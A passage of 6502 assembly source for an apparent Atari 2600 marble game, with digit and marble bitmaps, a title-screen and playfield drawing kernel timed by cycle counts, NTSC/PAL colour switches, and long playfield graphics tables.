0 NumberTwo dc.b %00111100 dc.b %00100000 dc.b %00100000 dc.b %00011000 dc.b %00000100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberThree dc.b %00111000 dc.b %00000100 dc.b %00000100 dc.b %00011000 dc.b %00000100 dc.b %00000100 dc.b %00111000 dc.b 0 NumberFour dc.b %00000100 dc.b %00000100 dc.b %00000100 dc.b %00111100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b 0 NumberFive dc.b %00011000 dc.b %00100100 dc.b %00000100 dc.b %00011000 dc.b %00100000 dc.b %00100000 dc.b %00111100 dc.b 0 NumberSix dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00111000 dc.b %00100000 dc.b %00100000 dc.b %00011000 dc.b 0 NumberSeven dc.b %00010000 dc.b %00010000 dc.b %00001000 dc.b %00001000 dc.b %00000100 dc.b %00000100 dc.b %00111100 dc.b 0 NumberEight dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberNine dc.b %00011000 dc.b %00100100 dc.b %00000100 dc.b %00011100 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 Marble1 IF DEBUG == 1 ; debug marble dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00011000 dc.b %00000000 dc.b %00011000 dc.b %00000000 dc.b %00000000 ELSE dc.b %00000000 dc.b %00011000 dc.b %00111100 dc.b %01111110 dc.b %01111110 dc.b %01111110 dc.b %00111100 dc.b %00011000 ENDIF ; Marble space dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 JoyStickGfx90 dc.b %00000000 dc.b %11101110 dc.b %00101010 dc.b %00101010 dc.b %11101010 dc.b %10101010 dc.b %10101010 dc.b %11101110 JoyStickGfx45 dc.b %00000000 dc.b %00101110 dc.b %00100010 dc.b %00100010 dc.b %11101110 dc.b %10101000 dc.b %10101000 dc.b %10101110 ;================= TitleScreenBank1 ;================= LDA INTIM BNE TitleScreenBank1 ; Whew! STA WSYNC ; [0] STA VBLANK ; Enable drawing again (set vblank to 0) LDA #0 STA COLUBK LDA #1 STA CTRLPF ; reflected LDA #$0E STA COLUP0 STA COLUP1 LDX NinetyDegrees LDA IncreasingCounter LSR AND #$0F STA COLUP0,X NOP NOP STA RESP0 NOP NOP NOP STA RESP1 LDY #10 TitleScreenLoop1 STA WSYNC DEY BNE TitleScreenLoop1 ;---------- LDY #53 ; screen logo 54 high (can be 108) TitleScreenLoop2 ;LDA #$88 ;STA COLUBK ;STA WSYNC ;DEY ;BPL TitleScreenLoop2 ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Title_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Title_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Title_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Title_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY BPL TitleScreenLoop2 ;======================= LDA #0 STA COLUBK STA PF1 STA PF2 LDY #40 TitleScreenLoop3 STA WSYNC DEY BNE TitleScreenLoop3 LDY #7 TitleScreenLoop4 LDA JoyStickGfx90,Y STA GRP0 LDA JoyStickGfx45,Y STA GRP1 STA WSYNC DEY BPL TitleScreenLoop4 LDY #79 TitleScreenLoop5 STA WSYNC DEY BNE TitleScreenLoop5 ;================= JMP CleanupScreen ;================= ;================= DrawScreenBank1 ;================= LDA INTIM BNE DrawScreenBank1 ; Whew! STA WSYNC ; [0] STA VBLANK ; Enable drawing again (set vblank to 0) ; First 2 lines of kernel are set-up for main stuff. ;LDA #0 ;STA COLUBK LDA #1 STA CTRLPF ; reflected ;=========== ; DRAW THE TIMER section IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUPF LDA #$0E ; same as NTSC/PAL STA COLUP0 STA COLUP1 LDA #$C0 STA PF2 LDA SecondsRemaining AND #%00001111 ; mask out right digit ASL ASL ASL STA RightNumber LDA SecondsRemaining AND #%11110000 ; mask out left digit CLC LSR STA LeftNumber LDY #6 STA WSYNC ; 1 blue line for score ScoreLoop LDA (LeftNumber),Y ;LDA NumberFive,Y STA GRP0 LDA (RightNumber),Y ;LDA NumberFive,Y STA GRP1 STA WSYNC DEY BPL ScoreLoop LDA #0 STA GRP0 STA GRP1 IF NTSC IF DEBUG = 1 LDA #$0E ELSE LDA #$82 ; blue ENDIF ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUP0 ; Define player 2 as red ;=========== ;LDY #(89-1) ; (89*2 = 178 + 8 + 2 + 4 on top = 192) LDY ScrollPointerTop DEY ; we need to set P0's position. ;==================== ; Calculate P1,P0 HPos ;==================== ; coarse/fine setting of P1 graphic HPos ; code by vdub_bobby LDX #0 LDA Player0HPosition NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP STX PF2 ; Calculate Player's left/right position on screen CalculatePlayersHPosLoop sec sta HMCLR sta WSYNC ; [5] DivideLoopPlayersBank1 sbc #15 bcs DivideLoopPlayersBank1 eor #7 asl asl asl asl sta.wx HMP0,X sta RESP0,X sta WSYNC ; [6] sta HMOVE STA WSYNC ; without this line, we screw up P1 positioning by ; touching HMP1 with an HMCLR too early on P0 positioning ;DEX ;LDA Player1HPosition ;BPL CalculatePlayersHPosLoop STA WSYNC ; to even out ;========== LDA OddFrameCheck BEQ DrawLoopBank1Pass1 STA WSYNC ; [1] ;========== DrawLoopBank1Pass1 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_WhiteData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_BlueData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY ;CPY ScrollPointerBottom CPY Player0VPosition BNE DrawLoopBank1Pass1 ;======================= ;================= LDX #7 ; marble frames DrawLoopBank1Pass2 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA P0MarbleRAM,X ; [4 , 16] STA GRP0 ; [3, 19] LDA Level_0_WhiteData_PF2_2,Y ; [4, 23] STA PF2 ; [3, 26] NOP ; [2, 28] NOP ; [2, 30] NOP ; [2, 32] NOP ; [2, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEX ; marble pointer ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA P0MarbleRAM,X ; [4 , 16] STA GRP0 ; [3, 19] LDA Level_0_BlueData_PF2_2,Y ; [4, 23] STA PF2 ; [3, 26] NOP ; [2, 28] NOP ; [2, 30] NOP ; [2, 32] NOP ; [2, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY ; frame pointer DEX ; marble pointer BPL DrawLoopBank1Pass2 ;======================= ;============= DrawLoopBank1Pass3 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_WhiteData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_BlueData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY CPY ScrollPointerBottom BPL DrawLoopBank1Pass3 ;======================= ;======================== ; scanline 192 ;======================== CleanupScreen ; Clear all registers here to prevent any possible bleeding. LDA #2 STA WSYNC ; Finish this scanline. STA VBLANK ; Make TIA output invisible, ; Now we need to worry about it bleeding when we turn ; the TIA output back on. LDY #0 STY PF0 STY PF1 STY PF2 STY GRP1 STY GRP0 STY VDELP1 STY ENAM0 STY ENAM1 STY ENABL ;========== LDA OddFrameCheck BNE ReturnFromDrawScreen STA WSYNC ;========== ReturnFromDrawScreen ;================== RTS ;================== ;================= OverScanBank1 ;================= IF NTSC LDA #35 ELSE ; (PAL) LDA #85 ENDIF STA TIM64T ;================= GameCalc2Bank1 ;================= ;================== ; Handle collisions ;================== JMP Bank3 ;(JSR HandleCollision) ;================== ; Clear them for next time ;================== AfterCollision_InBank1 LDA #0 STA CXCLR ;============================ ; Loop to get our 30 scanlines for overscan ;============================ WaitForEndOfOverscanBank1 LDA INTIM BNE WaitForEndOfOverscanBank1 STA WSYNC ; finish scanline 30 ;================== RTS ;================== ;==================== ; GRAPHICS DATA BELOW ;==================== ;REF=- (D0 of CTRLPF) ;| 4567 | 76543210 | 01234567 | 4567 | 76543210 | 01234567 | ;| PF0 | PF1 | PF2 | PF0 | PF1 | PF2 | ; ;REF=1 (D0 of CTRLPF) ;| 4567 | 76543210 | 01234567 | 76543210 | 01234567 | 7654 | ;| PF0 | PF1 | PF2 | PF2 | PF1 | PF0 | ;========== ;ORG $C700 align 256 ;========== Level_0_WhiteData_PF1_1 ; 20-0 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 ; 40-21 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $83 dc.b $A0 dc.b $C5 dc.b $22 dc.b $57 dc.b $AA dc.b $F4 dc.b $BA dc.b $5D dc.b $2E dc.b $17 dc.b $0A dc.b $15 ; 60-41 dc.b $8A dc.b $DC dc.b $A8 dc.b $50 dc.b $A8 dc.b $5C dc.b $AA dc.b $55 dc.b $BA dc.b $55 dc.b $AA dc.b $75 dc.b $AA dc.b $D5 dc.b $A9 dc.b $71 dc.b $A9 dc.b $C9 dc.b $A9 dc.b $29 ; 80-61 dc.b $A9 dc.b $A8 dc.b $A8 dc.b $AA dc.b $A9 dc.b $A9 dc.b $A9 dc.b $AB dc.b $A8 dc.b $A8 dc.b $A8 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA ; 100-81 dc.b $AA dc.b $AB dc.b $A8 dc.b $AD dc.b $A2 dc.b $B5 dc.b $88 dc.b $D9 dc.b $22 dc.b $67 dc.b $8A dc.b $1D dc.b $2A dc.b $77 dc.b $AA dc.b $9D dc.b $AA dc.b $A7 dc.b $AA dc.b $A9 ; 120-101 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $A8 dc.b $A9 dc.b $A8 dc.b $AD dc.b $AB dc.b $A3 dc.b $A3 dc.b $B5 dc.b $AE dc.b $8F ; 140-121 dc.b $8F dc.b $D7 dc.b $BB dc.b $3D dc.b $3E dc.b $5F dc.b $EF dc.b $F6 dc.b $FA dc.b $FD dc.b $7D dc.b $B9 dc.b $D8 dc.b $A0 dc.b $60 dc.b $A8 dc.b $C8 dc.b $B4 dc.b $70 dc.b $B2 ; 160-141 dc.b $AA dc.b $DD dc.b $DC dc.b $AC dc.b $AA dc.b $77 dc.b $72 dc.b $AD dc.b $AE dc.b $DF dc.b $CE dc.b $B6 dc.b $B9 dc.b $7D dc.b $BA dc.b $DA dc.b $A7 dc.b $77 dc.b $AA dc.b $9A ; 180-161 dc.b $BD dc.b $59 dc.b $16 dc.b $2E dc.b $0F dc.b $16 dc.b $25 dc.b $2A dc.b $23 dc.b $32 dc.b $29 dc.b $2A dc.b $17 dc.b $46 dc.b $26 dc.b $29 dc.b $5D dc.b $9A dc.b $1A dc.b $27 ; 200-181 dc.b $77 dc.b $AA dc.b $DA dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AC dc.b $A8 dc.b $70 dc.b $70 dc.b $A0 dc.b $A0 dc.b $C0 dc.b $C0 dc.b $80 dc.b $80 dc.b $00 Title_PF1_1 ; 1 dc.b $00 ; unused for now ; 20 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AB dc.b $AB dc.b $AB dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $51 ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AB dc.b $AB dc.b $AB dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $51 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $C800 align 256 ;========== Level_0_WhiteData_PF2_2 ; 20-0 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 ; 40-21 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $03 dc.b $04 dc.b $0E dc.b $15 dc.b $3B dc.b $51 dc.b $E0 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $05 dc.b $0A ; 60-41 dc.b $13 dc.b $2B dc.b $4D dc.b $AC dc.b $34 dc.b $B0 dc.b $D0 dc.b $C8 dc.b $49 dc.b $2B dc.b $29 dc.b $AA dc.b $6A dc.b $8A dc.b $5A dc.b $22 dc.b $56 dc.b $C8 dc.b $D5 dc.b $B2 ; 80-61 dc.b $36 dc.b $2D dc.b $13 dc.b $2B dc.b $4A dc.b $AD dc.b $34 dc.b $B0 dc.b $D4 dc.b $C5 dc.b $55 dc.b $15 dc.b $55 dc.b $D5 dc.b $15 dc.b $B5 dc.b $45 dc.b $2D dc.b $51 dc.b $CB ; 100-81 dc.b $D4 dc.b $B2 dc.b $35 dc.b $A6 dc.b $56 dc.b $9A dc.b $59 dc.b $6B dc.b $65 dc.b $AE dc.b $95 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB ; 120-101 dc.b $55 dc.b $EE dc.b $55 dc.b $B9 dc.b $55 dc.b $ED dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EF dc.b $4F dc.b $B6 ; 140-121 dc.b $55 dc.b $EB dc.b $47 dc.b $8D dc.b $03 dc.b $88 dc.b $1C dc.b $AA dc.b $77 dc.b $AA dc.b $05 dc.b $8E dc.b $03 dc.b $09 dc.b $1C dc.b $2A dc.b $77 dc.b $2A dc.b $05 dc.b $0F ; 160-141 dc.b $03 dc.b $01 dc.b $0C dc.b $06 dc.b $0E dc.b $04 dc.b $0D dc.b $01 dc.b $09 dc.b $22 dc.b $15 dc.b $45 dc.b $53 dc.b $BB dc.b $35 dc.b $35 dc.b $4E dc.b $EE dc.b $55 dc.b $B5 ; 180-161 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BD dc.b $5B dc.b $55 dc.b $EE dc.b $E5 dc.b $5B dc.b $5D dc.b $BE dc.b $9D dc.b $6D dc.b $73 dc.b $FB dc.b $75 dc.b $B5 dc.b $4E ; 200-181 dc.b $EE dc.b $55 dc.b $B5 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BC dc.b $58 dc.b $50 dc.b $E0 dc.b $E0 dc.b $40 dc.b $40 dc.b $80 dc.b $80 dc.b $00 dc.b $00 dc.b $00 Title_PF2_2 ; 1 dc.b $00 ; unused for now ; 20 dc.b $4D dc.b $5D dc.b $5D dc.b $5D dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $55 dc.b $5D dc.b $5D dc.b $5D dc.b $4C ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $5D dc.b $4D dc.b $4D dc.b $4D dc.b $5D dc.b $DD dc.b $DD dc.b $D5 dc.b $D5 dc.b $55 dc.b $55 dc.b $55 dc.b $5D dc.b $5D dc.b $DD dc.b $DD dc.b $CC ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $C900 align 256 ;========== Level_0_WhiteData_PF2_3 ; 20-0 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 ; 40-21 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $03 dc.b $80 dc.b $C5 dc.b $A2 dc.b $75 dc.b $2A dc.b $1D dc.b $0A dc.b $05 ; 60-41 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $80 dc.b $40 dc.b $20 dc.b $50 dc.b $C8 dc.b $D8 dc.b $B4 dc.b $4C dc.b $AC dc.b $2A dc.b $B6 dc.b $D2 dc.b $C3 dc.b $40 dc.b $05 dc.b $04 ; 80-61 dc.b $06 dc.b $01 dc.b $0A dc.b $07 dc.b $02 dc.b $01 dc.b $80 dc.b $40 dc.b $20 dc.b $50 dc.b $C8 dc.b $D8 dc.b $B4 dc.b $4C dc.b $AC dc.b $2A dc.b $B6 dc.b $D2 dc.b $C3 dc.b $40 ; 100-81 dc.b $00 dc.b $00 dc.b $80 dc.b $40 dc.b $20 dc.b $30 dc.b $88 dc.b $4C dc.b $A2 dc.b $93 dc.b $A8 dc.b $64 dc.b $6A dc.b $5B dc.b $9C dc.b $DD dc.b $AA dc.b $77 dc.b $AA dc.b $DD ; 120-101 dc.b $AA dc.b $77 dc.b $AA dc.b $DC dc.b $A8 dc.b $70 dc.b $A8 dc.b $DC dc.b $AA dc.b $77 dc.b $AA dc.b $DD dc.b $AA dc.b $77 dc.b $AA dc.b $DD dc.b $AB dc.b $77 dc.b $A7 dc.b $DB ; 140-121 dc.b $AA dc.b $75 dc.b $A9 dc.b $DC dc.b $B0 dc.b $64 dc.b $8E dc.b $D5 dc.b $BB dc.b $55 dc.b $A8 dc.b $FC dc.b $B0 dc.b $24 dc.b $0E dc.b $15 dc.b $3B dc.b $15 dc.b $28 dc.b $3C ; 160-141 dc.b $30 dc.b $20 dc.b $0C dc.b $18 dc.b $1C dc.b $08 dc.b $2C dc.b $20 dc.b $04 dc.b $11 dc.b $4A ; dc.b $22 dc.b $29 dc.b $5D dc.b $9A dc.b $9A dc.b $A7 dc.b $77 dc.b $AA dc.b $DA ; 180-161 dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AD dc.b $AA dc.b $77 dc.b $72 dc.b $AD dc.b $AE dc.b $DF dc.b $CE dc.b $B6 dc.b $B9 dc.b $7D dc.b $BA dc.b $DA dc.b $A7 ; 200-181 dc.b $77 dc.b $AA dc.b $DA dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AC dc.b $A8 dc.b $70 dc.b $70 dc.b $A0 dc.b $A0 dc.b $C0 dc.b $C0 dc.b $80 dc.b $80 dc.b $00 Title_PF2_3 ; 1 dc.b $00 ; unused for now ; 20 dc.b $5D dc.b $5D dc.b $5D dc.b $5D dc.b $50 dc.b $D0 dc.b $D0 dc.b $D0 dc.b $D9 dc.b $D9 dc.b $59 dc.b $59 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $5D dc.b $5D dc.b $5D dc.b $5D ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $3B dc.b $3B dc.b $BB dc.b $BB dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A3 dc.b $23 dc.b $23 dc.b $A3 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A3 dc.b $A3 dc.b $23 dc.b $23 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $CA00 align 256 ;========== Level_0_WhiteData_PF1_4 ; 20-0 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 ; 40-21 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $15 dc.b $B5 dc.b $45 dc.b $ED dc.b $51 dc.b $BB dc.b $54 dc.b $EE dc.b $55 dc.b $AB dc.b $55 dc.b $EA dc.b $55 dc.b $AA dc.b $55 dc.b $EE ; 60-41 dc.b $55 dc.b $BA dc.b $55 dc.b $EE dc.b $54 dc.b $BA dc.b $52 dc.b $EA dc.b $56 dc.b $B8 dc.b $55 dc.b $EE dc.b $54 dc.b $BA dc.b $52 dc.b $EA dc.b $56 dc.b $B8 dc.b $55 dc.b $EE ; 80-61 dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $54 dc.b $B8 dc.b $50 dc.b $E0 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 100-81 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $04 dc.b $08 dc.b $11 dc.b $3B dc.b $15 dc.b $0E dc.b $05 dc.b $03 ; 120-101 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $01 dc.b $02 dc.b $07 dc.b $07 dc.b $07 dc.b $0B dc.b $1D dc.b $1E ; 140-121 dc.b $1F dc.b $2F dc.b $77 dc.b $7B dc.b $7D dc.b $BE dc.b $DE dc.b $EC dc.b $F5 dc.b $FA dc.b $FB dc.b $72 dc.b $B4 dc.b $44 dc.b $CC dc.b $54 dc.b $91 dc.b $6A dc.b $E0 dc.b $64 ; 160-141 dc.b $54 dc.b $BA dc.b $B8 dc.b $58 dc.b $54 dc.b $EE dc.b $E5 dc.b $5B dc.b $5D dc.b $BE dc.b $9D dc.b $6D dc.b $73 dc.b $FB dc.b $75 dc.b $B5 dc.b $4E dc.b $EE dc.b $55 dc.b $35 ; 180-161 dc.b $7B dc.b $B3 dc.b $2D dc.b $5D dc.b $1E dc.b $2D dc.b $0B dc.b $15 dc.b $06 dc.b $05 dc.b $13 dc.b $15 dc.b $2E dc.b $0D dc.b $4D dc.b $53 dc.b $BB dc.b $35 dc.b $35 dc.b $47 ; 200-181 dc.b $EE dc.b $55 dc.b $B5 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BC dc.b $58 dc.b $50 dc.b $E0 dc.b $E0 dc.b $40 dc.b $40 dc.b $80 dc.b $80 dc.b $00 dc.b $00 dc.b $00 Title_PF1_4 ; 1 dc.b $00 ; unused for now ; 20 dc.b $3B dc.b $3B dc.b $3B dc.b $3B dc.b $22 dc.b $22 dc.b $22 dc.b $22 dc.b $3B dc.b $3B dc.b $3B dc.b $3B dc.b $08 dc.b $08 dc.b $08 dc.b $08 dc.b $3B dc.b $3B dc.b $3B dc.b $3B ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $01 dc.b $01 dc.b $01 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $01 dc.b $01 dc.b $01 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $CB00 align 256 ;========== Level_0_BlueData_PF1_1 ; 20-0 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 ; 40-21 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $83 dc.b $8A dc.b $D4 dc.b $88 dc.b $20 dc.b $50 dc.b $89 dc.b $84 dc.b $42 dc.b $21 dc.b $50 dc.b $C8 dc.b $55 ; 60-41 dc.b $22 dc.b $00 dc.b $00 dc.b $25 dc.b $63 dc.b $41 dc.b $00 dc.b $22 dc.b $66 dc.b $44 dc.b $00 dc.b $02 dc.b $06 dc.b $05 dc.b $01 dc.b $01 dc.b $09 dc.b $09 dc.b $29 dc.b $29 ; 80-61 dc.b $A9 dc.b $A9 dc.b $A8 dc.b $A8 dc.b $AA dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A9 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA ; 100-81 dc.b $AA dc.b $AB dc.b $AA dc.b $AC dc.b $A8 